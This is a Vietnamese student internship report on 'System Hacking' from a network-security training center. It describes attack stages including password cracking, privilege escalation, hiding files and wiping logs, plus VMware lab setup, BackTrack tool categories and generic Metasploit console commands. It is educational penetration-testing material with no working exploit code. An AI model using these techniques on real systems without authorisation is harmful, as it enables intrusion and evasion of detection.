SlideShare a Scribd company logo
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN 
KHOA ĐIỆN TỬ VIỄN THÔNG 
- - -    - - - 
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG 
VÀ AN NINH MẠNG QUỐC TẾ ATHENA 
BÁO CÁO THỰC TẬP 
SYSTEM HACKING 
Giảng viên hướng dẫn: Võ Đỗ Thắng 
Sinh viên thực hiện : Huỳnh Minh Trí 
Thành phố Hồ Chí Minh
System Hacking 
MỞ ĐẦU 
Phát tán virus đã thực sự trở thành một ngành "công nghiệp" trong hoạt 
động gián điệp năm 2013, như dự đoán từ đầu năm của Công ty An ninh mạng 
Bkav. Hoạt động gián điệp này không chỉ tồn tại ở những nước phát triển như 
Mỹ, Đức, Pháp… mà còn hiện hữu ngay tại Việt Nam. Trong năm qua, theo ghi 
nhận của Bkav, phần mềm gián điệp đã xuất hiện tại hầu hết các cơ quan quan 
trọng từ các cơ quan Chính phủ, Quốc hội tới Bộ Quốc phòng, Bộ Công an hay các 
ngân hàng, viện nghiên cứu, trường đại học… Các phần mềm gián điệp này lợi 
dụng lỗ hổng an ninh trong file văn bản (Word, Excel, PowerPoint) để phát tán. 
Cuối năm 2013, việc lợi dụng các file văn bản để cài phần mềm gián điệp 
đã tiến thêm một bước, không cần thông qua lỗ hổng mà chuyển sang sử dụng 
hình thức phishing. Trung tuần tháng 12, Bkav phát hiện một loạt các vụ tin tặc 
chèn mã độc vào file văn bản không sử dụng lỗ hổng. Mã độc ẩn dưới hình thức 1 
ảnh thu nhỏ được nhúng trực tiếp vào file văn bản. Để đọc nội dung, chắc chắn 
người dùng sẽ click để mở ảnh lớn hơn, như vậy sẽ kích hoạt mã độc. Ông Ngô 
Tuấn Anh, Phó chủ tịch phụ trách An ninh mạng của Bkav, cho biết: “Với hình 
thức này, bất kỳ máy tính nào cũng sẽ bị cài phần mềm gián điệp mà không cần 
lỗ hổng. Phishing để cài đặt phần mềm gián điệp sẽ được sử dụng rộng rãi và sẽ 
là xu hướng trong năm 2014”. 
Bài báo cáo này sẽ giới thiệu tổng quát cơ bản về các phương pháp mà 
Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiên bản hệ điều 
hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp 
chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho 
người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay. 
Huỳnh Minh Trí Page 1
System Hacking 
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG 
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TPHCM 
Em xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên TPHCM và 
khoa Điện Tử Viễn Thông đã tạo điều kiện cho em hoàn thành tốt đợt Thực Tập 
này. Đợt thực tập này đã cho em những kinh nghiệm quý báu. Những kinh 
nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc 
sau này. 
Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của 
bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc 
chắn không thể tránh khỏi những thiếu sót nhất định. Rất mong nhận được sự 
đóng góp, chia sẻ để em có thể làm tốt hơn nữa. Một lần nữa em xin chân thành 
cảm ơn. 
TPHCM, ngày 23 tháng 10 năm 2014 
Sinh viên thực tập 
Huỳnh Minh Trí 
Huỳnh Minh Trí Page 2
System Hacking 
LỜI CẢM ƠN TRUNG TÂM ATHENA 
Em xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế 
Athena, cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy 
Đỗ Võ Thắng và thầy Lê Đình Nhân đã nhiệt tình giúp đỡ và hướng dẫn em trong 
thời gian thực tập tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp 
nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn 
thành tốt bài báo cáo này. 
Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh 
nghiệm và tạo điều kiện cho em hoàn thành đề tài này. 
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong 
thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh 
nghiệm trong các công trình tìm hiểu, phát triển sau này. 
Một lần nữa tôi xin chân thành cảm ơn. 
TPHCM, ngày 23 tháng 10 năm 2014 
Sinh viên thực tập 
Huỳnh Minh Trí 
Huỳnh Minh Trí Page 3
System Hacking 
GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP 
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được 
thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy 
năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp 
phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế 
mũi nhọn, góp phần phát triển nước nhà. 
Lĩnh vực hoạt động chính: 
– Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên 
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc 
tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song 
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành 
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân 
hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính… 
– Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm 
ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh 
mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ 
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… 
– Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương 
trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa 
Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu 
Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự... 
Đội ngũ giảng viên : 
– Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các 
trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các 
chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư 
phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn 
Huỳnh Minh Trí Page 4
System Hacking 
bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA 
– Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến 
thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore... và 
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm 
ATHENA 
Liên hệ: 
– Cơ sở 1: 
92 Nguyễn Đình Chiểu, phường Đa Kao, Q1, TPHCM 
Điện thoại: 0907879477 
0943230099 
(08)38244041 
Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu 
– Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1, TPHCM 
Điện thoại: 0943200088 
(08)22103801 
Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét 
– Website: http://athena.edu.vn 
http://athena.com.vn 
– E-mail : support@athena.edu.vn tuvan@athena.edu.vn 
tuvan@athena.edu.vn 
Huỳnh Minh Trí Page 5
System Hacking 
NHẬN XÉT CỦA KHOA 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................... ................ 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................... ................ 
..................................................................................................................................................................... .................................................... 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................... ................ 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................... ................ 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................... ................ 
TPHCM, ngày ... tháng ... năm 2014 
Huỳnh Minh Trí Page 6
System Hacking 
NHẬN XÉT CỦA TRUNG TÂM 
...................................................................................................................................................................................... ................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
..................................................................................................................................................................... .................................................... 
.......................................................................................................................................................................................................... ............... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................................... 
TPHCM, ngày ... tháng ... năm 2014 
Giám đốc 
Huỳnh Minh Trí Page 7
System Hacking 
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
....................................................................................................................................................................................................... .................. 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
..................................................................................................................................................................... .................................................... 
.......................................................................................................................................................................................................... ............... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
......................................................................................................................................................................................................................... 
.................................................................................................................................................................. ....................................................... 
TPHCM, ngày ... tháng ... năm 2014 
Giảng viên hướng dẫn 
Huỳnh Minh Trí Page 8
System Hacking 
Huỳnh Minh Trí Page 9
System Hacking 
Huỳnh Minh Trí Page 10
System Hacking 
PHẦN 1: GIỚI THIỆU 
1. System Hacking là gì ? 
System hacking bao gồm những kỹ thuật lấy username, password dựa vào 
phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ 
điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông 
tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có 
thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm 
trọng cho các cá nhân, tổ chức. 
2. Các lỗ hổng thường khai thác trong hệ điều hành Windows 
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng 
mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó 
có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng 
này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của 
các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên 
máy tính của bạn. 
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều 
hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập 
nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các 
phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp 
phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này 
để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn 
cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy 
từng người. 
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới 
Huỳnh Minh Trí Page 11
System Hacking 
của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn 
đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ 
điều hành của Microsoft. 
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục 
tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, 
đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như 
sau: 
Quá trình tấn công vào một hệ thống 
– Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong 
hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu 
ích, chính xác hơn. 
Huỳnh Minh Trí Page 12
System Hacking 
– Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu 
cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào 
khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống. 
– Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ 
user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn 
công. 
– Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị 
trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công. 
– Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… 
Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt. 
– Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông 
tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu 
không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. 
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau 
quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ 
thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã 
được áp dụng cho mục đích truy tìm thông tin. 
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình 
tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm 
sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như 
xóa dữ liệu, chạy chương trình trojan, keylogger… 
Huỳnh Minh Trí Page 13
System Hacking 
PHẦN 2: VMWARE VÀ ẢO HÓA HỆ ĐIỀU HÀNH 
1. Giới thiệu VMware 
VMware Workstation là một phần mềm ảo hóa desktop mạnh mẽ dành 
cho các nhà phát triển/kiểm tra phần mềm và các chuyên gia IT cần chạy nhiều 
HĐH một lúc trên một máy PC. Người dùng có thể chạy các HĐH Windows, 
Linux, Netware hay Solaris x86 trên các máy ảo di động mà không cần phải khởi 
động lại hay phân vùng ổ cứng. VMware Workstation cung cấp khả năng hoạt 
động tuyệt vời và nhiều tính năng mới như tối ưu hóa bộ nhớ và khả năng quản 
lý các thiết lập nhiều lớp. Các tính năng thiết yếu như mạng ảo, chụp ảnh nhanh 
trực tiếp, kéo thả, chia sẻ thư mục và hỗ trợ PXE khiến VMware Workstation trở 
thành công cụ mạnh mẽ nhất và không thể thiếu cho các nhà doanh nghiệp phát 
triển tin học và các nhà quản trị hệ thống. 
Với hàng triệu khách hàng và hàng loạt các giải thưởng quan trọng, VMware 
Workstation đã được chứng minh là một công ghệ giúp tăng năng suất và sự linh 
họat trong công việc. Đây là một công cụ không thể thiếu cho các nhà phát triển 
phần mềm và các chuyên gia IT trên toàn thế giới. 
VMware Workstation họat động bằng cách cho phép nhiều HĐH và các ứng 
dụng của chúng chạy đồng thời trên một máy duy nhất. Các HĐH và ứng dụng 
này được tách ra vào trong các máy ảo. Những máy ảo này cùng tồn tại trên một 
phần cứng duy nhất. Các layer ảo của VMware sẽ kết nối các phần cứng vật lý với 
các máy ảo, do đó mỗi máy ảo sẽ có CPU, bộ nhớ, các ổ đĩa, thiết bị nhập/xuất 
riêng. 
Các tính năng cho người dùng: 
– Thiết lập và thử nghiệm các ứng dụng đa lớp, cập nhật ứng dụng và các 
Huỳnh Minh Trí Page 14
System Hacking 
miếng vá cho HĐH chỉ trên một PC duy nhất. 
– Dễ dàng phục hồi và chia sẻ các môi trường thử nghiệm được lưu trữ; 
giảm thiểu các thiết lập trùng lặp và thời gian thiết lập. 
– Làm cho việc học tập trên máy tính thuận lợi hơn do sinh viên luôn đuợc 
sử dụng máy với tình trạng “sạch sẽ” và thử nghiệm với nhiều HĐH, ứng dụng cá 
các công cụ trên những máy ảo an tòan và độc lập. 
– Chạy các bản demo phần mềm với các thiết lập phức tạp hoặc đa lớp trên 
một chiếc laptop 
– Tăng tốc độ giải quyết các rắc rối của người dùng cuối dựa trên một thư 
viện các máy ảo được thiết lập sẵn 
Những tính năng chính: 
– Hỗ trợ nhiều màn hình: Bạn có thể thiết lập để một VM trải rộng ra nhiều 
màn hình, hoặc nhiều VM, với mỗi VM trên một màn hình riêng biệt. 
– Hỗ trợ các thiết bị USB 2.0: Bây giờ bạn đã có thể sử dụng các thiết bị 
ngọai vi yêu cầu tốc độ làm việc cao trên VM, như máy MP3 và các thiết bị lưu 
trữ di động khác 
– VM Record/Replay: Bạn có thể sử dụng tính năng này để thu lại các hoạt 
động của VM và được đảm bảo là sẽ tái lập lại tình trạng của VM chính xác 100%. 
– Integrated Virtual Debugger: Workstation được tích hợp Visual Studio và 
Eclipse nên bạn có thể trực tiếp sử dụng, chạy và vá các lỗ hổng của các chương 
trình trong một VM từ một IDE yêu thích 
– Automation APIs (VIX API 2.0): Bạn có thể viết script hay chương trình để 
Huỳnh Minh Trí Page 15
System Hacking 
VM tự động thực hiện việc kiểm tra. 
Cách tạo nên các máy ảo từ VMware: 
Để sử dụng VMware đầu tiên chúng ta cần tạo nên một máy ảo, nơi mà 
chúng ta sẽ dùng để cài đặt nên các hệ điều hành. Chúng ta có thể tuỳ chọn dung 
lượng ổ cứng, dung lượng RAM, cách kết nối mạng của máy ảo… Việc tiếp theo 
cần làm là cài đặt nên một hệ điều hành trên máy ảo đó. Hiện tại, VMware hỗ trợ 
cài đặt rất nhiều dạng hệ điều hành. Chúng ta có thể cài các phiên bản của 
Windows, Linux, Unix… trên các máy ảo VMware. Việc cài đặt hệ điều hành trên 
máy ảo hoàn toàn tương tự như cách cài đặt trên các máy thật. 
2. Chia sẻ tài nguyên của các máy ảo: 
Chia sẻ CPU và RAM: Các máy ảo sẽ chia sẻ CPU và RAM của máy tính thật. 
Để đảm bảo hệ thống có thể chạy tốt, yêu cầu máy tính thật phải có cấu hình 
tương đối cao, khoảng 1GB RAM để có thể chạy đồng thời 4, 5 máy ảo. 
Chia sẻ ổ cứng: Khi tạo ra các máy ảo, chúng ta sẽ tạo ra một ổ cứng dành 
riêng cho máy ảo nằm trên máy thật. Ổ cứng ảo này được tạo trên vùng đĩa trống 
của ổ đĩa thật, do đó không ảnh hưởng đến các dữ liệu đang có trên ổ đĩa thật. 
Chúng ta có thể tuỳ chọn dung lượng của ổ cứng này, có thể ấn định ngay dung 
lượng hoặc cũng có thể để dung lượng của ổ cứng này là động, sẽ thay đổi tuỳ 
theo quá trình sử dụng của chúng ta sau này. 
Chia sẻ card mạng: Sau khi cài đặt lên, VMware sẻ tạo nên 2 card mạng 
VMware 1 và VMware 8 trên máy thật và máy thật có thể sử dụng 2 card mạng 
này để kết nối với các máy ảo. Khi lựa chọn cấu hình mạng cho các máy ảo, ta có 
thể chọn một trong các chế độ sau: 
– Bridged networking: Card mạng của máy ảo sẽ được gắn trực tiếp với 
Huỳnh Minh Trí Page 16
System Hacking 
card mạng của máy thật (sử dụng switch ảo VMnet0). Lúc này, máy ảo sẽ đóng 
vai trò như một máy trong mạng thật, có thể nhận DHCP từ mạng ngoài, hoặc đặt 
IP tĩnh cùng dải với mạng ngoài để giao tiếp với các máy ngoài mạng hoặc lên 
Internet. 
Cấu trúc mạng Bridged Networking 
– NAT: Máy ảo được cấu hình NAT sẽ sử dụng IP của máy thật để giao tiếp 
với mạng ngoài. Các máy ảo được cấp địa chỉ IP nhờ một DHCP ảo của VMware. 
Lúc này, các máy ảo sẽ kết nối với máy thật qua switch ảo VMnet8, và máy thật 
sẽ đóng vai trò NAT server cho các máy ảo. 
Cấu trúc mạng NAT 
– Host-only Networking: Khi cấu hình máy ảo sử dụng host-only 
networking, máy ảo sẽ được kết nối với máy thật trong một mạng riêng thông 
qua Switch ảo VMnet1. Địa chỉ của máy ảo và máy thật trong mạng host-only có 
thể được cấp bởi DHCP ảo gắn liền với Switch ảo Vmnet1 hoặc có thể đặt địa chỉ 
IP tĩnh cùng dải để kết nối với nhau. 
Huỳnh Minh Trí Page 17
System Hacking 
Cấu trúc mạng Host-Only 
– Ngoài các kết nối trên, ta có thể sử dụng các switch ảo trong VMware để 
kết nối các máy ảo thành một hệ thống như mong muốn. Khi cài đặt lên, VMware 
tạo sẵn cho chúng ta 10 Switch ảo từ VMnet0 đến VMnet9. Ngoài các Switch ảo 
VMnet0 (dùng cho mạng Bridged Networking), VMnet8 (dùng cho mạng Nat 
Networking) và VMnet1 (dùng cho mạng Host-Only Networking), chúng ta còn 7 
Switch ảo khác để thực hiện việc kết nối các máy ảo. Chúng ta có thể đặt IP động 
trên các máy nối với các Switch này để nhận DHCP ảo, hoặc có thể đặt IP tĩnh 
cùng dải cho các máy này đảm bảo chúng kết nối được với nhau. 
Chia sẻ ổ đĩa CD-ROM: Các máy ảo có thể sử dụng ổ CD-ROM của máy thật. 
Ngoài ra, ta có thể dùng một file ISO để đưa vào ổ CD-ROM của máy ảo, lúc này 
máy ảo sẽ nhận file ISO giống như một đĩa CD-ROM trong ổ đĩa của mình. 
3. Sử dụng Snapshot: 
Snapshot một máy ảo cho phép ta lưu lại trạng thái của máy ảo tại thời điểm 
đó. Snapshot sẽ lưu lại thông tin về ổ cứng, Ram và các Setting trên máy ảo. Sau 
khi lưu snapshot, chúng ta có thể quay trở lại trạng thái của máy ảo bất cứ lúc 
nào. 
Huỳnh Minh Trí Page 18
System Hacking 
VMware cho phép chúng ta lưu nhiều snapshot của máy ảo, vì thế người 
dùng có thể sử dụng một máy ảo vào nhiều ngữ cảnh khác nhau, tiết kiệm thời 
gian cho việc cấu hình. Chẳng hạn với một máy ảo A, trong một bài lab ta muốn 
nó là một máy chủ Domain Controller, nhưng trong bài lab khác ta muốn xấy 
dựng nó thành một máy chủ ISA. Để giải quyết vấn đề này, chúng ta có thể lưu 
snapshot của máy A tại thời điểm nó là domain controller, sau đó cấu hình nó 
thành một máy chủ ISA và lưu snapshot. Khi cần sử dụng máy ảo A với vai trò là 
một Domain Controller hay ISA, ta sẽ dùng trình quản lý Snapshot Manager để 
chuyển tới trạng thái mong muốn. 
PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP 
TRONG MẠNG LAN 
1. Hệ điều hành Backtrack 5 R3 
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển 
để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác 
nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong 
phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối 
Linux Ubuntu 11.10. 
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác 
nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas 
M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại 
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack 
là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và 
Auditor. 
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử 
nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong 
Huỳnh Minh Trí Page 19
System Hacking 
Backtrack 5 có thể được phân loại như sau: 
– Information gathering: loại này có chứa một số công cụ có thể được sử 
dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, 
trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các 
thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. 
– Network mapping: loại này chứa các công cụ có thể được sử dụng để 
kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục 
tiêu, và cũng làm portscanning. 
– Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy 
các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng 
chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và 
Simple Network Management Protocol (SNMP). 
– Web application analysis: loại này chứa các công cụ có thể được sử 
dụng trong theo dõi, giám sát các ứng dụng web. 
– Radio network analysis: Để kiểm tra mạng không dây, bluetooth và 
nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể 
loại này. 
– Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác 
các lỗ hổng tìm thấy trong các máy tính mục tiêu. 
– Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào 
các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để 
nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. 
– Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong 
Huỳnh Minh Trí Page 20
System Hacking 
việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có 
được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để 
duy trì quyền truy cập. 
– Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các 
công cụ trong thể loại này. 
– Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công 
cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa 
cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ 
cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong 
trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và 
các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. 
– Reverse engineering: Thể loại này chứa các công cụ có thể được sử 
dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 
2. Phần mềm Metasploit 
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ 
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống 
phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để 
kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ 
ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, 
assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: 
Linux, Windows, MacOS. Chúng ta có thể download chương trình tại 
www.metasploit.com 
Metasploit hỗ trợ nhiều giao diện với người dùng: 
– Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng 
Huỳnh Minh Trí Page 21
System Hacking 
các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn. 
– Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao 
diện Web. 
– Command line interface: dùng msfcli. 
Metasploit Enviroment: 
– Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, 
những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các 
module exploits. 
– Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và 
unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, 
không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment 
mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu 
trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. 
Sử dụng Metasploit Framework: 
2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà 
Metasploit có hỗ trợ để khai thác 
Show exploits: xem các module exploit mà framework có hỗ trợ. 
Use exploit_name: chọn module exploit. 
Info exploit_name: xem thông tin về module exploit. 
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các module 
trên www.metasploit.com hoặc qua lệnh msfupdate hoặc 
svnupdat/opt/metasploit/msf3/ 
Huỳnh Minh Trí Page 22
System Hacking 
2.2 Cấu hình Module exploit đã chọn: 
show options: Xác định những options nào cần cấu hình. set: cấu hình cho 
những option của module đó. 
Một vài module còn có những advanced options, chúng ta có thể xem bằng 
cách gõ dòng lệnh show advanceds. 
2.3 Verify những options vừa cấu hình: 
check: kiểm tra xem những option đã được set chính xác chưa. 
2.4 Lựa chọn target: 
show targets: những target được cung cấp bởi module đó. set: xác định 
target nào. 
2.5 Lựa chọn payload: 
show payloads: liệt kê ra những payload của module exploit hiện tại. 
info payload_name: xem thông tin chi tiết về payload đó. 
set payload payload_name: xác định payload module name. Sau khi lựa 
chọn payload nào, dùng lệnh show options để xem những options của payload 
đó. 
show advanced: xem những advanced options của payload đó. 
2.6 Thực thi exploit: 
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ 
cung cấp cho chúng ta những thông tin về hệ thống được khai thác. 
3. Sơ đồ tổng quan hệ thống mạng LAN 
Huỳnh Minh Trí Page 23
System Hacking 
Sơ đồ tổng quan hệ thống mạng LAN 
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với 
khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … 
